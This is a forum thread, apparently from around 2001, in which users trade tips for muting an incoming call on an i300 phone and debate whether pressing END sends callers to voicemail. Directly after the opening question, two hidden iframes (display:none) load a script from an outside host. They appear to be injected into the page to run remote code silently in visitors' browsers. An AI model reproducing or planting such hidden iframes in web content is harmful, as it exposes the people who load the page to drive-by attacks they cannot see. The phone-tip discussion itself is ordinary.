+ Reply to Thread

easy way to mute ringer during incoming call?

Is there a quick and easy way to silence the ringer without answering the phone during an incoming call? Say, when you don't want to answer the phone, but you'd rather not stand there listening to it ring for 45 seconds?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Option in Palm display

When my phone is in the Palm display mode (which is most of the time), the Caller ID box comes up with three options on how you want to handle the call - "Yes" (take the call), "No" (don't take the call), or "Silent". Silent works very well when I use it!

Are you saying you don't have this on your phone? Or is it when a call comes in and you were already in the phone display mode? I'm not sure what happens then - but if it's anything like my old Samsung, you should be able to hit either of the side volume-keys once and it should mute the ringer for that call only. Maybe they changed how they do things on the I300, but that's how things worked on my SCH-6100.

-Doug

Dan
    The volume up/down buttons as mute work fine....

Push the "End" button. This will mute the ringer, and allow the phone to go to voicemail.

Pushing the END button mutes the ring but the phone will still ring a number of times before going to Voicemail. The only way I could get the phone to immediately go to Voicemail on my Motorola Timeport was to power off. I assume my I300 is the same.

Here is some additional information I copied from the SprintPCS newsgroup via deja.com,

At present, GSM is the only technology that allows users to specify how long their phone will ring before "divert on no answer" occurs. On a GSM system, you can set that time to 5, 10, 15, 20, 25, or 30 seconds (the default is 15 seconds).

Many CDMA systems don't allow their users to set the "forward on no answer" feature anyway, and always divert to voice mail if you fail to "pick up" your phone. Some IS-136 systems allow access to what they call "No Answer Transfer", but they usually take it away from you when you opt for voice mail.

As far as I am aware, all GSM systems give you unfettered access to the various call forwarding options, even if you do have voice mail. You can decide if and when a call is diverted to voice mail, and how long it takes to do so. If you have set your "Forward on Busy" option to your voice mail, you can send a caller there IMMEDIATELY by pressing the END key while your phone is ringing. You can therefore check your call display and determine if you want to talk to this person or not.
    Last edited by sbiller; 11-19-2001 at 11:47 AM.

Correct, he was just wanting to silence the ringer.

I think it has something to do with the provider. I know with Voicestream you can send someone directly to voicemail by pushing end.

Wannabe Techie

Just Press End...

With the "i300" you can just press "END" when the phone rings to send the caller to voicemail. I due it often (sorry mom ) and it stops ringing almost instantly. I use Sprint PCS and it works just dandy. USA!!!
    "...my palms are too hairy to hide."
    -Eminem

Thumbs up

Thanks for the info sbiller. I knew it had to be something specific to the provider or signal

Thumbs down Just Pressing End

Hairy Palms,

I tried it again to be sure. It doesn't work. Try it yourself. Call your SprintPCS phone from a land line and press END. The call will continue to ring for another 20 seconds or so.

Administrator

Arrow

correct! pressing end or down key or silence or whatever will only MUTE the ring.. the phone will still ring on the callers end b4 going to VM... :o